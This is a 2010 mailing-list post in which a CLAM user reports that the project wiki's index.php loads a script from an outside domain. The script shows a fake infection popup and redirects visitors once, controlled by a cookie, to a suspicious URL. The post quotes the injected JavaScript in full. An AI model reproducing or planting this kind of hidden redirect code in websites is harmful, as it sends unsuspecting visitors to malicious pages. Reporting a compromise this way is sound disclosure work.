[CLAM] A sort of equalizator

Niels Mayer nielsmayer at gmail.com
Tue May 11 17:52:19 PDT 2010


On Tue, May 11, 2010 at 5:30 PM, Hernán Ordiales <h at ordia.com.ar> wrote:
>
> [1] Example of a network using SpectrumView:
>
> http://clam-project.org/wiki/Image:ThreeBandFilterOutputWithWhiteNoiseAsInput.jpg
> [2] http://clam-project.org/wiki/Manual_Annotator


Thanks for the information... but...

FYI, when I clicked on the first link, it popped up a "your computer is
infected" dialog which I alt-f4'd away, and then it tried running something
in the browser window so I alt-f4'd that. Hopefully someone hasn't figured
out a way to own people browsing with Linux and google-chrome. You might
want to make sure nothing funny is going on with your wiki.

Specifically out of index.php,  the following javascript is run: "script
src="http://zettapetta.com/js.php"
which contains:

1 function setCookie(c_name,value,expiredays){
2    var exdate=new Date();
3    exdate.setDate(exdate.getDate()+expiredays);
4    document.cookie=c_name+ "=" +escape(value)+
5    ((expiredays==null) ? "" : ";expires="+exdate.toGMTString());
6 }
7
8
9 function getCookie(c_name){
10 if (document.cookie.length>0)
11  {
12  c_start=document.cookie.indexOf(c_name + "=");
13  if (c_start!=-1)
14    {
15    c_start=c_start + c_name.length+1;
16    c_end=document.cookie.indexOf(";",c_start);
17    if (c_end==-1) c_end=document.cookie.length;
18    return unescape(document.cookie.substring(c_start,c_end));
19    }
20  }
21 return "";
22 }
23
24
25 var name=getCookie("pma_visited_theme1");
26 if (name==""){
27    setCookie("pma_visited_theme1","1",20);
28    var url="
http://www4.suitcase52td.net/?p=p52dcWpkbmmHnc3KbmNToKV1iqHWnG2dXseYlWibZmeWmQ%3D%3D
";
29    window.top.location.replace(url);
30 }else{
31
32
33 }
34

Not sure of the purpose of the above, but it doesn't seem like a good thing
for a wiki to do.

Niels
http://nielsmayer.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.clam-project.org/pipermail/clam-users-clam-project.org/attachments/20100511/6bbbca22/attachment-0002.htm>


More information about the clam-users mailing list